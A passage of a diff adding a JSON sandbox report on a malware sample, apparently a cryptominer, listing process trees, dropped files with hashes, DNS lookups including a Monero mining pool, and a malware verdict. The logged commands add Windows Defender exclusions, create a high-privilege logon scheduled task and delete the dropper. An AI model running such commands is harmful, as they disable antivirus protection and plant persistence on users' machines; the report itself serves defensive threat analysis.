+                          ]
+                        }
+                      ]
+                    },
+                    {
+                      "process_id": "2316",
+                      "time_offset": 28,
+                      "name": "cmd /c powershell -Command Add-MpPreference -ExclusionPath %UserProfile% & powershell -Command Add-MpPreference -ExclusionPath %AppData% & powershell -Command Add-MpPreference -ExclusionPath %Temp% & powershell -Command Add-MpPreference -ExclusionPath %SystemRoot% & exit",
+                      "children": [
+                        {
+                          "process_id": "2288",
+                          "time_offset": 49,
+                          "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Windows"
+                        },
+                        {
+                          "process_id": "1192",
+                          "time_offset": 45,
+                          "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Local\\\\Temp"
+                        },
+                        {
+                          "process_id": "2912",
+                          "time_offset": 38,
+                          "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Roaming"
+                        },
+                        {
+                          "process_id": "1580",
+                          "time_offset": 31,
+                          "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\admin"
+                        }
+                      ]
+                    }
+                  ]
+                },
+                {
+                  "process_id": "1652",
+                  "time_offset": 21,
+                  "name": "C:\\Windows\\System32\\cmd.exe /c schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\" & exit",
+                  "children": [
+                    {
+                      "process_id": "772",
+                      "time_offset": 22,
+                      "name": "schtasks /create /f /sc onlogon /rl highest /tn services64 /tr \"C:\\\\Windows\\\\system32\\\\services64.exe\""
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        },
+        {
+          "process_id": "2688",
+          "time_offset": 3,
+          "name": "cmd /c powershell -Command Add-MpPreference -ExclusionPath %UserProfile% & powershell -Command Add-MpPreference -ExclusionPath %AppData% & powershell -Command Add-MpPreference -ExclusionPath %Temp% & powershell -Command Add-MpPreference -ExclusionPath %SystemRoot% & exit",
+          "children": [
+            {
+              "process_id": "2328",
+              "time_offset": 32,
+              "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Windows"
+            },
+            {
+              "process_id": "2400",
+              "time_offset": 20,
+              "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Local\\\\Temp"
+            },
+            {
+              "process_id": "2180",
+              "time_offset": 17,
+              "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\<USER>\\\\AppData\\\\Roaming"
+            },
+            {
+              "process_id": "2752",
+              "time_offset": 4,
+              "name": "powershell -Command Add-MpPreference -ExclusionPath C:\\\\Users\\\\admin"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "process_id": "3068",
+      "name": "'C:\\Users\\user\\Desktop\\itami.exe' ",
+      "children": [
+        {
+          "process_id": "6132",
+          "name": "C:\\Windows\\System32\\cmd.exe 'cmd' /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+          "children": [
+            {
+              "process_id": "616",
+              "name": "C:\\Windows\\System32\\conhost.exe C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
+            },
+            {
+              "process_id": "4368",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user' "
+            },
+            {
+              "process_id": "7316",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming' "
+            },
+            {
+              "process_id": "7884",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Local\\Temp' "
+            },
+            {
+              "process_id": "5496",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Windows' "
+            }
+          ]
+        },
+        {
+          "process_id": "1868",
+          "name": "'C:\\Windows\\System32\\cmd.exe' /c C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe 'C:\\Users\\user\\Desktop\\itami.exe'",
+          "children": [
+            {
+              "process_id": "3428",
+              "name": "C:\\Windows\\System32\\conhost.exe C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
+            },
+            {
+              "process_id": "3052",
+              "name": "C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe  'C:\\Users\\user\\Desktop\\itami.exe'",
+              "children": [
+                {
+                  "process_id": "760",
+                  "name": "'C:\\Windows\\System32\\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr ''C:\\Windows\\system32\\services64.exe'' & exit",
+                  "children": [
+                    {
+                      "process_id": "4324",
+                      "name": "C:\\Windows\\System32\\conhost.exe C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
+                    },
+                    {
+                      "process_id": "6904",
+                      "name": "C:\\Windows\\System32\\schtasks.exe schtasks  /create /f /sc onlogon /rl highest /tn 'services64' /tr ''C:\\Windows\\system32\\services64.exe'' "
+                    }
+                  ]
+                },
+                {
+                  "process_id": "5796",
+                  "name": "C:\\Windows\\System32\\services64.exe 'C:\\Windows\\system32\\services64.exe' ",
+                  "children": [
+                    {
+                      "process_id": "6972",
+                      "name": "C:\\Windows\\System32\\cmd.exe 'cmd' /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+                      "children": [
+                        {
+                          "process_id": "6012",
+                          "name": "C:\\Windows\\System32\\conhost.exe C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
+                        },
+                        {
+                          "process_id": "7016",
+                          "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user' "
+                        },
+                        {
+                          "process_id": "7740",
+                          "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming' "
+                        },
+                        {
+                          "process_id": "3528",
+                          "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Local\\Temp' "
+                        },
+                        {
+                          "process_id": "7544",
+                          "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Windows' "
+                        }
+                      ]
+                    }
+                  ]
+                },
+                {
+                  "process_id": "940",
+                  "name": "'C:\\Windows\\System32\\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe'",
+                  "children": [
+                    {
+                      "process_id": "3412",
+                      "name": "C:\\Windows\\System32\\conhost.exe C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
+                    },
+                    {
+                      "process_id": "4120",
+                      "name": "C:\\Windows\\System32\\choice.exe choice  /C Y /N /D Y /T 3 "
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "process_id": "4",
+      "name": "C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{FB98DDB0-12A6-4219-939B-AA32BC351C9C}\\MpKslDrv.sys"
+    },
+    {
+      "process_id": "3724",
+      "name": "C:\\Windows\\System32\\services64.exe C:\\Windows\\system32\\services64.exe",
+      "children": [
+        {
+          "process_id": "5588",
+          "name": "C:\\Windows\\System32\\cmd.exe 'cmd' /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit",
+          "children": [
+            {
+              "process_id": "1872",
+              "name": "C:\\Windows\\System32\\conhost.exe C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
+            },
+            {
+              "process_id": "3852",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user' "
+            },
+            {
+              "process_id": "7664",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming' "
+            },
+            {
+              "process_id": "1440",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Local\\Temp' "
+            },
+            {
+              "process_id": "7644",
+              "name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Windows' "
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "calls_highlighted": [
+    "GetTickCount",
+    "IsDebuggerPresent",
+    "GetSystemMetrics",
+    "GetAdaptersAddresses",
+    "ExecQueryWmi"
+  ],
+  "files_copied": [
+    {
+      "source": "C:\\Users\\<USER>\\Downloads\\itami.exe",
+      "destination": "C:\\Windows\\system32\\services64.exe"
+    }
+  ],
+  "verdicts": [
+    "MALWARE"
+  ],
+  "ja3_digests": [
+    "1074895078955b2db60423ed2bf8ac23"
+  ],
+  "files_written": [
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\r40wd1kx.3kv.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\31tuusg3.opk.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\50excb03.oo4.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\l5ol3ivj.0yo.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\vfmqars4.i5d.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\qlkiyw23.tqd.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\ajw4on02.cnf.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\xk0qlqrr.amv.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\gics3x1t.y3b.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\zf1sh221.kgw.psm1",
+    "C:\\Windows\\system32\\Microsoft\\Libs\\sihost64.exe",
+    "C:\\Windows\\system32\\Microsoft\\Libs\\WR64.sys",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\o5dsdqgu.otp.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\2fd0qk2j.4tw.psm1",
+    "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\Microsoft\\UPnP Device Host\\upnphost\\udhisapi.dll",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\r40wd1kx.3kv.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\50excb03.oo4.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe",
+    "C:\\Windows\\System32\\services64.exe",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\vfmqars4.i5d.ps1",
+    "C:\\Windows\\System32\\Tasks\\services64",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\itami.exe.log",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\services64.exe.log",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\svchost64.exe.log",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Caches",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dezdqqbs.0iy.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ehwww3j4.nwj.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ksnrixfy.zsj.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpnen4uo.0jd.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_urbqvbub.fom.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2p22j2q.23w.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe",
+    "C:\\Users\\user\\AppData\\Roaming",
+    "C:\\Users\\user\\Documents\\20211002",
+    "C:\\Users\\user\\Documents\\20211002\\PowerShell_transcript.648351.JPLGNUq3.20211002124253.txt",
+    "C:\\Users\\user\\Documents\\20211002\\PowerShell_transcript.648351.avyG4ev3.20211002124252.txt",
+    "C:\\Users\\user\\Documents\\20211002\\PowerShell_transcript.648351.wlpxO+wY.20211002124243.txt",
+    "C:\\Windows\\System32\\services64.exe",
+    "C:\\Windows\\System32\\services64.exe:Zone.Identifier",
+    "C:\\Windows\\System32\\services64.exe\\:Zone.Identifier:$DATA",
+    "C:\\Windows\\system32\\catroot",
+    "C:\\Windows\\system32\\catroot2",
+    "C:\\Windows\\system32\\services64.exe",
+    "\\Device\\ConDrv\\\\Connect"
+  ],
+  "verdict_confidence": 50,
+  "files_deleted": [
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_szru5clb.hz1.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uziie1be.o3w.psm1",
+    "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bxbbqyn1.42q.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zd5wo1bl.0s4.psm1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1cnfgxx4.j3z.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vxbypyzm.i0l.psm1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ptqjarqv.vxa.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0u55w3yq.ahp.psm1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_impxnvm2.iu4.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cmb001lx.5jn.psm1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1w5qmr2u.zhw.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ofm3i11t.j3o.psm1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duzasj3i.aja.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iuhb3i03.hko.psm1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_acgbo4m5.cgl.ps1",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tb1memd2.3ud.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\r40wd1kx.3kv.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\31tuusg3.opk.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\50excb03.oo4.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\l5ol3ivj.0yo.psm1",
+    "C:\\Windows\\system32\\Microsoft\\Libs\\sihost64.log",
+    "C:\\Windows\\system32\\Microsoft\\Libs\\sihost64-2.log",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\vfmqars4.i5d.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\qlkiyw23.tqd.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\ajw4on02.cnf.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\xk0qlqrr.amv.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\gics3x1t.y3b.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\zf1sh221.kgw.psm1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\o5dsdqgu.otp.ps1",
+    "C:\\Users\\<USER>\\AppData\\Local\\Temp\\2fd0qk2j.4tw.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dezdqqbs.0iy.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ehwww3j4.nwj.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ksnrixfy.zsj.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpnen4uo.0jd.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_urbqvbub.fom.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2p22j2q.23w.psm1"
+  ],
+  "dns_lookups": [
+    {
+      "resolved_ips": [
+        "185.65.135.234"
+      ],
+      "hostname": "sanctam.net"
+    },
+    {
+      "resolved_ips": [
+        "104.192.141.1"
+      ],
+      "hostname": "bitbucket.org"
+    },
+    {
+      "resolved_ips": [
+        "135.125.238.108",
+        "51.255.34.118",
+        "51.15.54.102",
+        "185.71.66.31",
+        "51.15.58.224",
+        "46.105.31.147",
+        "51.15.78.68",
+        "51.68.143.81",
+        "217.182.169.148",
+        "51.83.33.228",
+        "51.15.65.182",
+        "51.15.69.136"
+      ],
+      "hostname": "xmr-eu1.nanopool.org"
+    },
+    {
+      "resolved_ips": [
+        "185.65.135.234"
+      ],
+      "hostname": "sanctam.net"
+    },
+    {
+      "resolved_ips": [
+        "104.192.141.1"
+      ],
+      "hostname": "bitbucket.org"
+    }
+  ],
+  "files_dropped": [
+    {
+      "path": "%windir%\\system32\\Microsoft\\Libs\\sihost64.exe",
+      "sha256": "4e83dda2631f12a8ee4f6996fe6144d6016f7583c79ea6672a2b6d5c4b530006"
+    },
+    {
+      "path": "%TEMP%\\svchost64.exe",
+      "sha256": "b2a887dbada2082a7e0a8bcbf4294a0970ce52eb65e50569b2b0ef413f7f7e58"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_szru5clb.hz1.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uziie1be.o3w.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\powershell.exe.log"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bxbbqyn1.42q.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zd5wo1bl.0s4.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1cnfgxx4.j3z.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vxbypyzm.i0l.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ptqjarqv.vxa.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0u55w3yq.ahp.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe.log"
+    },
+    {
+      "path": "C:\\Windows\\System32\\services64.exe"
+    },
+    {
+      "path": "C:\\Windows\\System32\\Tasks\\services64"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\svchost64.exe.log"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_impxnvm2.iu4.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cmb001lx.5jn.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1w5qmr2u.zhw.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ofm3i11t.j3o.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duzasj3i.aja.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_iuhb3i03.hko.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_acgbo4m5.cgl.ps1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tb1memd2.3ud.psm1"
+    },
+    {
+      "path": "%USERPROFILE%\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\services64.exe.log"
+    },
+    {
+      "path": "C:\\Windows\\System32\\Microsoft\\Libs"
+    },
+    {
+      "path": "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.exe"
+    },
+    {
+      "path": "C:\\Windows\\System32\\Microsoft\\Libs\\WR64.sys"
+    },
+    {
+      "path": "C:\\Windows\\System32\\Microsoft\\Libs\\sihost64.log"
+    },
+    {
+      "path": "C:\\Users\\<USER>\\AppData\\Local\\Temp\\svchost64.exe",
+      "sha256": "b2a887dbada2082a7e0a8bcbf4294a0970ce52eb65e50569b2b0ef413f7f7e58"
+    },
+    {
+      "path": "C:\\Windows\\system32\\Microsoft\\Libs\\sihost64.exe",
+      "sha256": "4e83dda2631f12a8ee4f6996fe6144d6016f7583c79ea6672a2b6d5c4b530006"
+    },
+    {
+      "path": "C:\\Windows\\system32\\Microsoft\\Libs\\WR64.sys",
+      "sha256": "11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\itami.exe.log",
+      "sha256": "e3c87716559caa8d132753a9644a6645de391c1f4161c2c087d89979bf35bab8",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\services64.exe.log",
+      "sha256": "e3c87716559caa8d132753a9644a6645de391c1f4161c2c087d89979bf35bab8",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\svchost64.exe.log",
+      "sha256": "84ab172263e61ffeb4602deb6b0c1b7379b2fa8635d0eaed341ffac50e40949d",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0patdpio.3xx.psm1",
+      "sha256": "9ffb57f0545b65e27c09890a5a03dcf90daac0b9393ef5925f7b362e533ec837",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1uvbzlrc.opf.ps1",
+      "sha256": "9ffb57f0545b65e27c09890a5a03dcf90daac0b9393ef5925f7b362e533ec837",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_31iylmzs.xxt.psm1",
+      "sha256": "7ef9fef9bd41021e9b684e72dbd4971e48dc64bb8f0a6736735c2288d2502492",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4asclr2o.yt4.ps1",
+      "sha256": "8bec218a699dbc7f8f540e0ff62601628e9b0dfcd4d05f2882c1ee4f0b7bd78c",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5phsv3jl.ami.ps1",
+      "sha256": "3ecfb0138847f1fa808de17e84faf8d906b5d8cf9a1900c60e7544748965d2d3",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_a3aznfqy.lzr.psm1",
+      "sha256": "115453343e898072f0b6533f3be55b64254b953d0288f2f870baf3d1e0a9266e",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bh4qr0kn.0ze.psm1",
+      "sha256": "d2eb1f13dfbd6204b4ca67aa7a79df8f9510ea9291b7e7eb8edf22d564fbeb50",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dezdqqbs.0iy.ps1",
+      "sha256": "7daf7c08b5eac7d29a0b9a7515095eaa7946b7fd143acbf6c5e77f888455e152",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dfw1flq2.oy3.psm1",
+      "sha256": "8bec218a699dbc7f8f540e0ff62601628e9b0dfcd4d05f2882c1ee4f0b7bd78c",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dwvpr1jv.ots.ps1",
+      "sha256": "06a617a7783c07fb02908ed723a0db15afdc1c7a4f1b4bd57ad15c2e36ebe9b8",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ehwww3j4.nwj.ps1",
+      "sha256": "fa3e0aaca82b873e655bea2ff93cfa6f3a4c6486ab6052c53857876dde72f58e",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_hp4hbyex.qrt.psm1",
+      "sha256": "3ecfb0138847f1fa808de17e84faf8d906b5d8cf9a1900c60e7544748965d2d3",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_hquxlnlz.iuk.ps1",
+      "sha256": "9d1eb3834d562860c1bf8e4adbcf965f32e1832f6c9dade9e540960f85b06258",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_itbaklkq.1um.ps1",
+      "sha256": "5d280a86d5c239f4a2b2f0b64d3c1727ac8f99ed334e01c37eb4fc26fc29396d",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ksnrixfy.zsj.psm1",
+      "sha256": "9756a0acb56ba01037baed7bd5c63715be1690d45dbf62044f5fbf80998f010a",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpnen4uo.0jd.psm1",
+      "sha256": "7daf7c08b5eac7d29a0b9a7515095eaa7946b7fd143acbf6c5e77f888455e152",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nrjxggv3.fsl.ps1",
+      "sha256": "7ef9fef9bd41021e9b684e72dbd4971e48dc64bb8f0a6736735c2288d2502492",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_prhqhb34.qv1.psm1",
+      "sha256": "9d1eb3834d562860c1bf8e4adbcf965f32e1832f6c9dade9e540960f85b06258",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qopx14lz.jud.ps1",
+      "sha256": "d2eb1f13dfbd6204b4ca67aa7a79df8f9510ea9291b7e7eb8edf22d564fbeb50",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_stnmcojb.0wy.psm1",
+      "sha256": "06a617a7783c07fb02908ed723a0db15afdc1c7a4f1b4bd57ad15c2e36ebe9b8",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_urbqvbub.fom.ps1",
+      "sha256": "9756a0acb56ba01037baed7bd5c63715be1690d45dbf62044f5fbf80998f010a",
+      "type": "TEXT"
+    },
+    {
+      "path": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_w52umfa4.fgg.psm1",
